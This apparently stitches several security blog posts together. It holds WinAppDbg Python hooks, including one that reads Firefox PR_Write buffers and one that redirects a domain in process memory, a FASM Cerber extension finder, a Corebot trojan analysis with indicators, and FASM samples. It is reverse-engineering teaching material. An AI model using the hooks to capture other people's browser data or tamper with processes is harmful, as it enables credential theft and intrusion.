# logger.log_text("Started %d - %s" % (my_process.get_pid(), my_process.get_filename()))


VII. GetLoadedModules
class DebugEvents(winappdbg.EventHandler):
    """
    Event handler class.
    event: https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/event.py
    """

    def load_dll(self, event):
        """
        Called when a new module is loaded.
        """
        # https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/module.py#L71

        """
        Module object methods:
        get_base, get_filename, get_name, get_size, get_entry_point,
        get_process, set_process, get_pid,
        get_handle, set_handle, open_handle, close_handle

        get_size and get_entry_point do not work because WinAppDbg internally
        uses GetModuleInformation.
        https://msdn.microsoft.com/en-us/library/ms683201(v=VS.85).aspx
        And it cannot get info on files with "that were loaded with the
        LOAD_LIBRARY_AS_DATAFILE flag.""

        This is related:
        https://blogs.msdn.microsoft.com/oldnewthing/20150716-00/?p=45131
        """
        module = event.get_module()

        logstring = "\nLoaded DLL:\nName: %s\nFilename: %s\nBase Addr: %s\n" % \
            (module.get_name(), module.get_filename(), hex(module.get_base()))

        mylogger.log_text(logstring)

        # _ = module.get_size()

        print module.get_handle()

# Create an instance of our eventhandler class
myeventhandler = DebugEvents()


VIII. GetProcessCreateProcessInfo
class DebugEvents(winappdbg.EventHandler):
    """
    Event handler class.
    event: https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/event.py
    """

    def create_process(self, event):
        process  = event.get_process()
        pid      = event.get_pid()
        # pid    = process.get_pid()
        filename = process.get_filename()

        mylogger.log_text("CreateProcess %d - %s" % (pid, filename))

    def exit_process(self, event):
        process  = event.get_process()
        pid      = event.get_pid()
        # pid    = process.get_pid()
        filename = process.get_filename()

        mylogger.log_text("ExitProcess %d - %s" % (pid, filename))

    def create_thread(self, event):
        process  = event.get_process()
        thread   = event.get_thread()

        tid  = thread.get_tid()
        name = thread.get_name()

        mylogger.log_text("CreateThread %d - %s" % (tid, name))

    def exit_thread(self, event):
        process  = event.get_process()
        thread   = event.get_thread()

        tid  = thread.get_tid()
        name = thread.get_name()

        mylogger.log_text("ExitThread %d - %s" % (tid, name))


# Create an instance of our eventhandler class
myeventhandler = DebugEvents()


IX. BasicHookFunction
class DebugEvents(winappdbg.EventHandler):
    """
    Event handler class.
    event: https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/event.py
    """

    def load_dll(self, event):
        module = event.get_module()

        if module.match_name("kernel32.dll"):

            # Resolve function addresses
            address_CreateFileA = module.resolve("CreateFileA")
            address_CreateFileW = module.resolve("CreateFileW")

            # Types are here
            # https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/win32/defines.py#L380
            sig_CreateFileA = (PVOID, DWORD, DWORD, PVOID, DWORD, DWORD, HANDLE)
            sig_CreateFileW = (PVOID, DWORD, DWORD, PVOID, DWORD, DWORD, HANDLE)

            pid = event.get_pid()

            # Hook function(pid, address, preCB, postCB, paramCount, signature)
            # https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/breakpoint.py#L3969
            event.debug.hook_function(pid, address_CreateFileA,
                                      preCB=pre_CreateFileA,
                                      postCB=post_CreateFileA,
                                      signature=sig_CreateFileA)

            event.debug.hook_function(pid, address_CreateFileW,
                                      preCB=pre_CreateFileW,
                                      postCB=post_CreateFileW,
                                      signature=sig_CreateFileW)

            # Another way of setting up hooks without signature

            """
            event.debug.hook_function(pid, address_CreateFileA,
                                      preCB=pre_CreateFileA,
                                      postCB=post_CreateFileA,
                                      paramCount=7)

            event.debug.hook_function(pid, address_CreateFileW,
                                      preCB=pre_CreateFileW,
                                      postCB=post_CreateFileW,
                                      paramCount=7)
            """

# Callback functions
# -------------------

# Callback function parameters are always
# (event, ra (return address), then function parameters)
# self is first if part of the eventhandler class


def pre_CreateFileW(event, ra, lpFileName, dwDesiredAccess, dwShareMode,
                    lpSecurityAttributes, dwCreationDisposition,
                    dwFlagsAndAttributes, hTemplateFile):

    """
    This will be called as soon as we enter the function and before the
    function stack frame is created.
    """

    process = event.get_process()

    # Suspend the process because why not
    process.suspend()
    mylogger.log_text("Hit kernel32!CreateFileW")

    # 32-bit so all parameters are on stack

    # In case you want a pointer to the top of the stack
    # thread = event.get_thread()

    # All memory read stuff are at
    # https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/process.py#L125

    # fUnicode=True because we are in the Wide or Unicode version of the API
    myFileName = process.peek_string(lpFileName, fUnicode=True)

    mylogger.log_text("lpFilename: %s" % (myFileName))

    # Resume the process
    process.resume()


def pre_CreateFileA(event, ra, lpFileName, dwDesiredAccess, dwShareMode,
                    lpSecurityAttributes, dwCreationDisposition,
                    dwFlagsAndAttributes, hTemplateFile):

    process = event.get_process()

    # Suspend the process because why not
    process.suspend()

    mylogger.log_text("Hit kernel32!CreateFileA")

    # fUnicode=False because we are in the ANSI version
    myFileName = process.peek_string(lpFileName, fUnicode=False)

    mylogger.log_text("lpFilename: %s" % (myFileName))

    process.resume()


def post_CreateFileW(event, retval):

    mylogger.log_text("Leaving kernel32!CreateFileW")
    mylogger.log_text("Return value: %x" % (retval))


def post_CreateFileA(event, retval):

    mylogger.log_text("Leaving kernel32!CreateFileA")
    mylogger.log_text("Return value: %x" % (retval))


# Create an instance of our eventhandler class
myeventhandler = DebugEvents()


X. BetterHookFunction
class DebugEvents(winappdbg.EventHandler):
    """
    Event handler class.
    event: https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/event.py
    """

    # Better hooking
    # https://winappdbg.readthedocs.io/en/latest/Debugging.html#example-9-intercepting-api-calls

    apiHooks = {

        # Hooks for the kernel32 library.
        "kernel32.dll": [

            # We have seen these before
            # Function       Signature
            ("CreateFileA", (PVOID, DWORD, DWORD, PVOID, DWORD, DWORD, HANDLE)),
            ("CreateFileW", (PVOID, DWORD, DWORD, PVOID, DWORD, DWORD, HANDLE)),

            # Can also pass parameter count
            # ("CreateFileA", 6),
            # ("CreateFileW", 6),
        ],
    }

    # Now we can simply define a method for each hooked API.
    # "pre_"  methods are called when entering the hooked function.
    # "post_" methods are called when returning from the hooked function.

    def pre_CreateFileW(self, event, ra, lpFileName, dwDesiredAccess,
                        dwShareMode, lpSecurityAttributes, dwCreationDisposition,
                        dwFlagsAndAttributes, hTemplateFile):

        process = event.get_process()
        myFileName = process.peek_string(lpFileName, fUnicode=True)
        mylogger.log_text("pre_CreateFileW opening file %s" % (myFileName))

    def post_CreateFileW(self, event, retval):
        mylogger.log_text("Return value: %x" % retval)

    def pre_CreateFileA(self, event, ra, lpFileName, dwDesiredAccess,
                        dwShareMode, lpSecurityAttributes, dwCreationDisposition,
                        dwFlagsAndAttributes, hTemplateFile):

        process = event.get_process()
        myFileName = process.peek_string(lpFileName, fUnicode=False)
        mylogger.log_text("pre_CreateFileA opening file %s" % (myFileName))

    def post_CreateFileA(self, event, retval):
        mylogger.log_text("Return value: %x" % retval)


# Create an instance of our eventhandler class
myeventhandler = DebugEvents()


XI. HookInternetExplorer HttpSendRequestW
class DebugEvents(winappdbg.EventHandler):
    """
    Event handler class.
    event: https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/event.py
    """

    """
        BOOL HttpSendRequest(
            _In_ HINTERNET hRequest,
            _In_ LPCTSTR   lpszHeaders,
            _In_ DWORD     dwHeadersLength,
            _In_ LPVOID    lpOptional,
            _In_ DWORD     dwOptionalLength
        );
    """

    apiHooks = {

        # Hooks for the wininet.dll library - note this is case-sensitive
        "wininet.dll": [

            # Function            Signature
            ("HttpSendRequestW", (HANDLE, PVOID, DWORD, PVOID, DWORD)),
        ],
    }

    def pre_HttpSendRequestW(self, event, ra, hRequest, lpszHeaders,
                             dwHeadersLength, lpOptional, dwOptionalLength):

        process = event.get_process()

        if dwHeadersLength != 0:
            mylogger.log_text(winapputil.utils.get_line())
            mylogger.log_text("HttpSendRequestW")

            headers = process.peek_string(lpszHeaders, fUnicode=True)
            mylogger.log_text("Headers %s" % (headers))

        if dwOptionalLength != 0:
            # This is not unicode - see the pointer name (lp vs. lpsz)
            # fUnicode is set to False (default) then
            optional = process.peek_string(lpOptional, fUnicode=False)

            mylogger.log_text("Optional %s" % (optional))
            mylogger.log_text(winapputil.utils.get_line())


# Create an instance of our eventhandler class
myeventhandler = DebugEvents()




XII. HookInternetExplorer HttpSendRequestW/HttpOpenRequest
class DebugEvents(winappdbg.EventHandler):
    """
    Event handler class.
    event: https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/event.py
    """

    """
        BOOL HttpSendRequest(
            _In_ HINTERNET hRequest,
            _In_ LPCTSTR   lpszHeaders,
            _In_ DWORD     dwHeadersLength,
            _In_ LPVOID    lpOptional,
            _In_ DWORD     dwOptionalLength
        );

        HINTERNET HttpOpenRequest(
          _In_ HINTERNET hConnect,
          _In_ LPCTSTR   lpszVerb,
          _In_ LPCTSTR   lpszObjectName,
          _In_ LPCTSTR   lpszVersion,
          _In_ LPCTSTR   lpszReferer,
          _In_ LPCTSTR   *lplpszAcceptTypes,
          _In_ DWORD     dwFlags,
          _In_ DWORD_PTR dwContext
        );
    """

    apiHooks = {

        # Hooks for the wininet.dll library - note this is case-sensitive
        "wininet.dll": [

            # Function            Signature
            ("HttpSendRequestW", (HANDLE, PVOID, DWORD, PVOID, DWORD)),
            ("HttpOpenRequestW", (HANDLE, PVOID, PVOID, PVOID, PVOID, PVOID,
                                  DWORD, PVOID)),
        ],
    }

    def pre_HttpSendRequestW(self, event, ra, hRequest, lpszHeaders,
                             dwHeadersLength, lpOptional, dwOptionalLength):

        process = event.get_process()

        if dwHeadersLength != 0:
            mylogger.log_text(winapputil.utils.get_line())
            mylogger.log_text("HttpSendRequestW")

            headers = process.peek_string(lpszHeaders, fUnicode=True)
            mylogger.log_text("Headers %s" % (headers))

        if dwOptionalLength != 0:
            # This is not unicode - see the pointer name dummy (lp vs. lpsz)
            # False by default but a good idea to include it for clarity
            optional = process.peek_string(lpOptional, fUnicode=False)

            mylogger.log_text("Optional %s" % (optional))
            mylogger.log_text(winapputil.utils.get_line())

    def pre_HttpOpenRequestW(self, event, ra, hConnect, lpszVerb,
                             lpszObjectName, lpszVersion, lpszReferer,
                             lplpszAcceptTypes, dwFlags, dwContext):

        process = event.get_process()

        verb = process.peek_string(lpszVerb, fUnicode=True)
        if verb is None:
            verb = "GET"

        obj = process.peek_string(lpszObjectName, fUnicode=True)

        mylogger.log_text(winapputil.utils.get_line())
        mylogger.log_text("HttpOpenRequestW")
        mylogger.log_text("verb: %s" % verb)
        mylogger.log_text("obj : %s" % obj)
        mylogger.log_text(winapputil.utils.get_line())


# Create an instance of our eventhandler class
myeventhandler = DebugEvents()


XIII. HoookFireFoxFunction PR_Write
class DebugEvents(winappdbg.EventHandler):
    """
    Event handler class.
    event: https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/event.py
    """

    # Better hooking
    # https://winappdbg.readthedocs.io/en/latest/Debugging.html#example-9-intercepting-api-calls

    """
    PRInt32 PR_Write(
        PRFileDesc *fd,
        const void *buf,
        PRInt32 amount);

    fd:     A pointer to the PRFileDesc object for a file or socket
    buf:    A pointer to the buffer holding the data to be written
    amount: The amount of data, in bytes, to be written from the buffer
    """

    apiHooks = {

        # Hooks for the nss3.dll library
        'nss3.dll': [

            ('PR_Write', (PVOID, PVOID, PVOID)),
        ],
    }

    def pre_PR_Write(self, event, ra, fd, buf, amount):

        process = event.get_process()

        if (amount > 100) and (amount < 1000):
            mylogger.log_text("PR_Write")

            # https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/process.py#L1581
            contents = process.read(buf, amount)

            mylogger.log_text("%s" % str(contents))

            mylogger.log_text(winapputil.utils.get_line())


# Create an instance of our eventhandler class
myeventhandler = DebugEvents()


XIV. ModifySleep on x86/X64
class DebugEvents(winappdbg.EventHandler):
    """
    Event handler class.
    event: https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/event.py
    """

    # Better hooking
    # https://winappdbg.readthedocs.io/en/latest/Debugging.html#example-9-intercepting-api-calls

    """
    VOID WINAPI Sleep(
        _In_ DWORD dwMilliseconds
    );
    https://msdn.microsoft.com/en-us/library/windows/desktop/ms686298(v=vs.85).aspx
    """

    apiHooks = {

        # Hooks for the kernel32.dll library
        "kernel32.dll": [

            # Note how are passing only one parameter
            ("Sleep", (DWORD, )),

            # We can also pass the number of arguments instead of signature
            # ("Sleep", 1),
        ],
    }

    def pre_Sleep(self, event, ra, dwMilliseconds):

        process = event.get_process()
        process.suspend()

        thread = event.get_thread()

        bits = thread.get_bits()
        emulation = thread.is_wow64()

        logstring = "Original dwMilliseconds %d" % dwMilliseconds

        mylogger.log_text(logstring)

        # If running on a 32-bit machine or 32-bit process on 64-bit machine
        if bits == 32 or emulation is True:
            top_of_stack = thread.get_sp()

            # return_address, dwMilliseconds = thread.read_stack_dwords(2)
            # logstring = "Return Address %s" % \
            #     winappdbg.HexDump.address(return_address, bits)

            # mylogger.log_text(logstring)

            process.write_dword(top_of_stack+((bits/8)*1), 0)

        # AMD64 calling convention on Windows uses fastcall
        # rcx, rdx, r8, r9 then stack

        elif bits == 64:
            thread.set_register("Rcx", 10000)

        process.resume()
# Create an instance of our eventhandler class
myeventhandler = DebugEvents()


XV. ModifyDomainFunction in IE InternetConnectW
class DebugEvents(winappdbg.EventHandler):
    """
    Event handler class.
    event: https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/event.py
    """

    # Better hooking
    # https://winappdbg.readthedocs.io/en/latest/Debugging.html#example-9-intercepting-api-calls

    """
    HINTERNET InternetConnect(
      _In_ HINTERNET     hInternet,
      _In_ LPCTSTR       lpszServerName,
      _In_ INTERNET_PORT nServerPort,
      _In_ LPCTSTR       lpszUsername,
      _In_ LPCTSTR       lpszPassword,
      _In_ DWORD         dwService,
      _In_ DWORD         dwFlags,
      _In_ DWORD_PTR     dwContext
    );
    """

    apiHooks = {

        # Hooks for the wininet.dll library
        "wininet.dll": [

            # InternetConnectW
            # https://msdn.microsoft.com/en-us/library/windows/desktop/aa384363(v=vs.85).aspx
            # ("InternetConnectW", (HANDLE, PVOID, WORD, PVOID, PVOID, DWORD, DWORD, PVOID)),
            ("InternetConnectW", 8),

        ],
    }

    # Now we can simply define a method for each hooked API.
    # Methods beginning with "pre_" are called when entering the API,
    # and methods beginning with "post_" when returning from the API.

    def pre_InternetConnectW(self, event, ra, hInternet, lpszServerName,
                             nServerPort, lpszUsername, lpszPassword,
                             dwService, dwFlags, dwContext):

        process = event.get_process()
        process.suspend()
        thread = event.get_thread()

        server_name = process.peek_string(lpszServerName, fUnicode=True)
        print(server_name)

        if server_name == "example.com":

            # mylogger.log_text(server_name)

            # Encoding as UTF16
            new_server_name = "google.com".encode("utf-16le")

            # Get length of new payload
            payload_length = len(new_server_name)

            # Allocate memory in target process and get a pointer
            new_payload_addr = event.get_process().malloc(payload_length)

            # Write the new payload to that pointer
            process.write(new_payload_addr, new_server_name)

            top_of_stack = thread.get_sp()

            bits = thread.get_bits()
            emulation = thread.is_wow64()

            if bits == 32 or emulation is True:

                # Write the pointer to the new payload with the old one
                process.write_dword(top_of_stack + 8, new_payload_addr)

            elif bits == 64:
                thread.set_register("Rdx", new_payload_addr)

        process.resume()


# Create an instance of our eventhandler class
myeventhandler = DebugEvents()

XVI. RegistryReader RegQueryValueExW

class DebugEvents(winappdbg.EventHandler):
    """
    Event handler class.
    event: https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/event.py
    """

    # Better hooking
    # https://winappdbg.readthedocs.io/en/latest/Debugging.html#example-9-intercepting-api-calls

    """
    LONG WINAPI RegQueryValueEx(
      _In_        HKEY    hKey,
      _In_opt_    LPCTSTR lpValueName,
      _Reserved_  LPDWORD lpReserved,
      _Out_opt_   LPDWORD lpType,
      _Out_opt_   LPBYTE  lpData,
      _Inout_opt_ LPDWORD lpcbData
    );
    """

    apiHooks = {

        # Hooks for the adviapi32.dll library
        # Can also hook kernel32.dll
        "advapi32.dll": [

            # RegQueryValueEx
            # https://msdn.microsoft.com/en-us/library/windows/desktop/ms724911(v=vs.85).aspx
            # ("RegQueryValueExW", (HANDLE, PVOID, PVOID, PVOID, PVOID, PVOID)),
            ("RegQueryValueExW", 6),

        ],
    }

    def pre_RegQueryValueExW(self, event, ra, hKey, lpValueName, lpReserved,
                             lpType, lpData, lpcbData):

        # Store the pointer for later use
        self.hKey = hKey
        self.lpValueName = lpValueName
        self.lpType = lpType
        self.lpData = lpData
        self.lpcbData = lpcbData

    def post_RegQueryValueExW(self, event, retval):
        process = event.get_process()

        process.suspend()

        table = winappdbg.Table("\t")
        table.addRow("", "")

        # Need to watch out for optional parameters
        if self.lpType is not 0:
            keyType = process.read_dword(self.lpType)
            table.addRow("keyType", keyType)

        valueName = process.peek_string(self.lpValueName, fUnicode=True)
        size = process.read_dword(self.lpcbData)

        table.addRow("valueName", valueName)
        table.addRow("size", size)

        if self.lpData is not 0:
            data = process.read(self.lpData, size)
            table.addRow("data", data)
            table.addRow("data-hex", data.encode("hex"))

        mylogger.log_text(table.getOutput())
        mylogger.log_text("-"*30)

        process.resume()


# Create an instance of our eventhandler class
myeventhandler = DebugEvents()


XVII RegistryWriter
class DebugEvents(winappdbg.EventHandler):
    """
    Event handler class.
    event: https://github.com/MarioVilas/winappdbg/blob/master/winappdbg/event.py
    """

    # Better hooking
    # https://winappdbg.readthedocs.io/en/latest/Debugging.html#example-9-intercepting-api-calls

    """
    LONG WINAPI RegQueryValueEx(
      _In_        HKEY    hKey,
      _In_opt_    LPCTSTR lpValueName,
      _Reserved_  LPDWORD lpReserved,
      _Out_opt_   LPDWORD lpType,
      _Out_opt_   LPBYTE  lpData,
      _Inout_opt_ LPDWORD lpcbData
    );
    """

    apiHooks = {

        # Hooks for the advapi32.dll library
        "advapi32.dll": [

            # RegQueryValueEx
            # https://msdn.microsoft.com/en-us/library/windows/desktop/ms724911(v=vs.85).aspx
            # ("RegQueryValueExW", (HANDLE, PVOID, PVOID, PVOID, PVOID, PVOID)),
            ("RegQueryValueExW", 6),

        ],
    }

    def pre_RegQueryValueExW(self, event, ra, hKey, lpValueName, lpReserved,
                             lpType, lpData, lpcbData):

        # Store the pointer for later use
        self.hKey = hKey
        self.lpValueName = lpValueName
        self.lpType = lpType
        self.lpData = lpData
        self.lpcbData = lpcbData

    def post_RegQueryValueExW(self, event, retval):
        process = event.get_process()

        process.suspend()

        valueName = process.peek_string(self.lpValueName, fUnicode=True)

        if valueName == "layout":
            # size = process.read_dword(self.lpcbData)
            # data = process.read(self.lpData, size)

            newLayout = 0x00

            process.write_dword(self.lpData, newLayout)

            # OR
            # process.write(self.lpData, "00".decode("hex"))

        process.resume()
# Create an instance of our eventhandler class
myeventhandler = DebugEvents()

Let’s Code: Cerber Extension Finder in FASM

Inspiration: https://twitter.com/VK_Intel/status/875247835880534017

Goal: Identify Cerber ransomware extension on any machine based on MachineGuid’s value.

Github: https://github.com/vkremez/MalwareConfigurations/blob/master/cerber_ext_finder.ASM

Here is the ASM code in FASM:

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

format pe gui 4.0

include ‘win32ax.inc’

entry cerber_ext

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; CERBER Extension Finder ;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; by @VK_Intel ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

section ‘.text’ code readable executable

cerber_ext:

invoke RegOpenKeyExA, HKEY_LOCAL_MACHINE,CryptoReg,NULL,KEY_READ,ckey

invoke VirtualAlloc, NULL, 24, MEM_COMMIT, PAGE_READWRITE

mov [RegBuffer], eax

invoke RegQueryValueExA, [ckey], MachineGuid, NULL,dword_type,[RegBuffer],RegSize

invoke lstrlen, [RegBuffer]

mov ebx, [RegBuffer]

add ebx, eax

start_find:

dec ebx

mov edx, [ebx]

cmp dl, 2dh ; “-” in hex

je one_more

jmp start_find

one_more:

dec ebx

mov edx, [ebx]

cmp dl, 2dh ; “-” in hex

je final

jmp one_more

final:

inc ebx

invoke VirtualAlloc, NULL, 4, MEM_COMMIT, PAGE_READWRITE

mov [fourthGuid], eax

invoke lstrcpyn,[fourthGuid],ebx,5

invoke MessageBox, 0, [fourthGuid], Cerber_Ext, MB_OK

invoke ExitProcess, 0

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

section ‘.data’ data readable writable

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

CryptoReg db ‘SOFTWARE\Microsoft\Cryptography’,0

MachineGuid db ‘MachineGuid’,0

ckey dd ?

dword_type dd REG_DWORD

RegBuffer dd ?

RegSize dd 256

fourthGuid dd ?

Cerber_Ext db ‘==> Your Cerber Extension <==', 0

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

section ‘.itable’ import data readable

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

library kernel32,’kernel32.dll’,\

advapi32,’Advapi32.dll’,\

user32, ‘user32.dll’

import user32,\

MessageBox,’MessageBoxA’

import kernel32,\

ExitProcess,’ExitProcess’,\

lstrlen, ‘lstrlenA’,\

lstrcpyn, ‘lstrcpynA’,\

VirtualAlloc, ‘VirtualAlloc’

import advapi32,\

RegOpenKeyExA, ‘RegOpenKeyExA’,\

RegQueryValueExA, ‘RegQueryValueExA’

Corebot Modular Trojan: Malware Analysis

Goal: Dissect modular Corebot banking Trojan with its DGA, rootkit, Powershell, runas, screenshot, process injection into svchost in SUSPENDED_MODE, and other modules.

MD5: 854d7769ed01915df8374ff18ae6785e

SHA-1: f923923e7af017e77e80d57578cfd88b990ce1e5

SHA-256: 0ce3290ed92979a5f13fbb799d7128e9dbc579e3f1bea3b560551a73f482de8f

imphash: 63c53219cb193f80ff22f173a8ffef05

Size: 640.0 KB (655361 bytes)

Static Analysis: Corebot

PDB: .rdata:00D14278 C:\\work\\itco\\core\\bin\\x86\\Release\\core[.]pdb\

Timestamp: Wed Oct 14 07:56:42 2015

Inject functions:

Powershell module (powershell[.]exe -NonInteractive -NoProfile -NoLogo -ExecutionPolicy Unrestricted -File “%s” via “cmd mode con cols=4000 line s=1000”):

Self-deletion batch script:

Runas as explorer[.]exe module:

User-mode rootkit module -> “\\\\.\\PhysicalDrive0”:

Xfer from the user-mode rootkit module routine:

DGA seed algorithm:

Create a process %WINDIR%\System32\svchost[.]exe with the CREATE_SUSPENDED flag. The primary thread of the new process is created in a suspended state, and does not run until the ResumeThread function is called.

Red Flags:

The file modifies the registry
The file references Alternate Data Stream (ADS)
The file is scored (40/54) by VirusTotal
The file references the Remote Desktop Session Host Server
The file references the Windows Native API
The file references the Security Descriptor Definition Language (SDDL)
The file references the Service Control Manager (SCM)
The file references the Desktop window
The file references the Windows Cryptographic interface
The file references the Windows Debug Helper interface
The file queries for files and streams
The file references the Event Log
The file references Inter-Process Communication (IPC)
The file references the Domain Name System (DNS) API
The file references data on a Socket
The file references the RPC Network Data Representation (NDR) Engine
The file opts for Address Space Layout Randomization (ASLR)
The file opts for cookies on the stack (GS)
The file imports 2 decorated symbol(s)
The file has no Version
The file does not contain a digital certificate
The file checksum (0x00000000) is invalid
The debug file name (core[.]pdb) is different than the file name (corebot[.]exe)

Dynamic Analysis: Corebot

Mutexes:

————————————————–

::62DFDF4F-C9F7-4416-9688-41C7791D0C33
{F4EE296B-9B08-4B04-8443-7E76A45FE740}

Process Analysis Log:

Process: svchost[.]exe
Size: 14336 Bytes
MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18

—————————————————————————

Monitored RegKeys

Path -> Value *

————————————————–

Path: HKCU\Software\Microsoft\Windows\CurrentVersion\Run –> Value: 1932a393-6ee2-a084-05de-868ddc92d287=C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\46604e10-2147-a135-0a93-c63f477cff8d\272f38ca-8023-4abc-a8f7-91009ce205a7[.]exe

Domain Generation Algorithm (DGA) resolution ending in *ddns[.]net:

Other bot information collector procedure forming request:

os_version
version
process_name
os_version_short
volume_sn
country_name
lang_name
default_browser
os_arch
is_admin
is_admin_group

p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; line-height: 20.0px; font: 13.0px ‘Helvetica Neue’; color: #333333; -webkit-text-stroke: #333333} p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; line-height: 20.0px; font: 13.0px ‘Helvetica Neue’; color: #777777; -webkit-text-stroke: #777777} p.p3 {margin: 0.0px 0.0px 0.0px 0.0px; line-height: 20.0px; font: 13.0px ‘Helvetica Neue’; color: #333333; -webkit-text-stroke: #333333; min-height: 15.0px} p.p4 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Helvetica; color: #000000; -webkit-text-stroke: #000000; min-height: 13.0px} p.p5 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Helvetica; color: #000000; -webkit-text-stroke: #000000} span.s1 {font-kerning: none} span.s2 {text-decoration: underline ; font-kerning: none} span.Apple-tab-span {white-space:pre}

FASM: Flat Assembler, also known as "FASM": Sample Code

Goal: Enrich own understanding of the Flat Assember (FASM) code constructs to enhance malware analysis and forward-engineering skills especially with PE files. I find it to be extremely helpful to have code samples ready to use/analyze.
Source: Betamaster

Why FASM?
FASM is a 32-bit, open-source, cross-platform assembler, targeting the IA-32 and x86-64 architectures (in addition, FASMARM – in unofficial port of FASM, targets the ARM architecture). It is very lightweight, fast, and rather simple to leverage in Windows API programming challenges.

I. Simple Application: Hello World

format PE console
entry start
 
include 'win32a.inc'
 
;======================================
section '.data' data readable writeable
;======================================
 
hello_newline    db "Hello World!",10,0
hello_no_newline db "Hello World! (without a new line)",0
 
;=======================================
section '.code' code readable executable
;=======================================
 
start:
 
        ccall   [printf],hello_newline      ; Print 'Hello World!' and start a new line.
        ccall   [printf],hello_no_newline   ; Print 'Hello World!' without starting a new line.
 
        ccall   [getchar]                   ; I added this line to exit the application AFTER the user pressed any key.
        stdcall [ExitProcess],0             ; Exit the application
 
;====================================
section '.idata' import data readable
;====================================
 
library kernel,'kernel32.dll',\
        msvcrt,'msvcrt.dll'
 
import  kernel,\
        ExitProcess,'ExitProcess'
 
import  msvcrt,\
        printf,'printf',\
        getchar,'_fgetchar

II. Create a process

format PE GUI 4.0
entry start
 
include 'win32a.inc'
 
start:
 invoke CreateProcessA,txt_location,0,0,0,0,CREATE_NEW_CONSOLE,0,0,StartupInfo,ProcessInfo
 call [ExitProcess]
 
; Custom Data: Contains the location of notepad.exe, StartupInfo and ProcessInfo:
section '.data' data readable writeable
 txt_location db 'C:\Windows\System32\notepad.exe',0
 StartupInfo STARTUPINFO
 ProcessInfo PROCESS_INFORMATION
 
; Imported functions and corresponding names of DLL files:
section '.idata' import data readable writeable
 library kernel,'KERNEL32.DLL'
 
 import kernel,\
 CreateProcessA, "CreateProcessA",\
 ExitProcess,'ExitProcess'

III. Kill a process

format PE GUI 4.0
entry start
 
include 'win32a.inc'
 
;================== code =====================
section '.code' code readable executable
;=============================================
 
start:
        invoke GetCurrentProcess                                                ; Retrieve a pseudo handle for current process
        invoke OpenProcessToken,eax,TOKEN_QUERY_TOKEN_ADJUST_PRIVILEGES,phToken ; Open access token associated with this process
        invoke LookupPrivilegeValue,0,Privilege ,pLocalId                       ; Retrieve the locally unique identifier (LUID)
        mov    [PrivilegeCount],1                                               ; [PrivilegeCount] = 1
        mov    [Attributes],2                                                   ; [Attributes]     = 2
        invoke AdjustTokenPrivileges,[phToken],0,PrivilegeCount ,0,0,0          ; Enable privileges on our token
 
        mov    [prcs.dwSize],sizeof.PROCESSENTRY32                              ; Store the required size of PROCESSENTRY32 in prcs.dwSize
        invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0                  ; Take a snapshot of the specified processes (get all running processes)
        mov    [hSnapshot], eax                                                 ; Save the snapshot handle
        invoke Process32First,[hSnapshot],prcs                                  ; Retrieve information about the first process encountered in our system snapshot
.loop:
        mov    edi,PrcList                                                      ; EDI = filename of process we want to kill
        invoke StrStrI,prcs.szExeFile, edi                                      ; Compare the current process name with the one we want to kill
        cmp    eax,0                                                            ; - || -
        je     .next                                                            ; Jump = Not equal, continue with the next process
        call   kill                                                             ; Else : Kill the process
.next:
        invoke Process32Next,[hSnapshot],prcs                                   ; Retrieve the next process in our snapshot
        cmp    eax,0                                                            ; Check if there are still processes we didn't check
        jne    .loop                                                            ; Jump = Continue the loop with the current process
        invoke ExitProcess,0                                                    ; Else : No more processes. Exit.
kill:
        invoke OpenProcess,PROCESS_TERMINATE,0,[prcs.th32ProcessID]             ; Open the process with terminate privileges
        invoke TerminateProcess,eax,0                                           ; Terminate it (Kill process)
        retn                                                                    ; And return (= exit as well)
 
;=================== data ====================
section '.data' data readable writeable
;=============================================
 
TOKEN_QUERY_TOKEN_ADJUST_PRIVILEGES =28h
TH32CS_SNAPPROCESS = 2
 
struct PROCESSENTRY32
        dwSize dd ?
        cntUsage dd ?
        th32ProcessID dd ?
        th32DefaultHeapID dd ?
        th32ModuleID dd ?
        cntThreads dd ?
        th32ParentProcessID dd ?
        pcPriClassBase dd ?
        dwFlags dd ?
        szExeFile db 260 dup(?)
ends
 
PrivilegeCount dd ?
pLocalId       dd ?
Attributes     dd ?
phToken        dd ?
